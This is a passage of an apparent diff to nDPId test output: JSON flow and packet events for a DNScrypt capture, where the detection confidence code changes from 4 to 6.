00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7t1AAL0RzDEKAAABXV\/ipbSvAbsCCALbx+wBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7t4gAL0R6HAKAAABXV\/ipcAiAbsGBEBnx+kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":266,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312402} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":266,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7t4Aub0RDUQKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7t8gAL0R6G8KAAABXV\/ipeMBAbsGBB2Gx+sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7uBAAL0RzC4KAAABXV\/ipaSsAbsCCALbx+oBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":269,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312402} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":269,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7t8Aub0RDUMKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7uFAAL0RzC0KAAABXV\/ipeY4AbsCCALbx+gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7uIgAL0R6GwKAAABXV\/ipZ6TAbsGBGH4x+cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA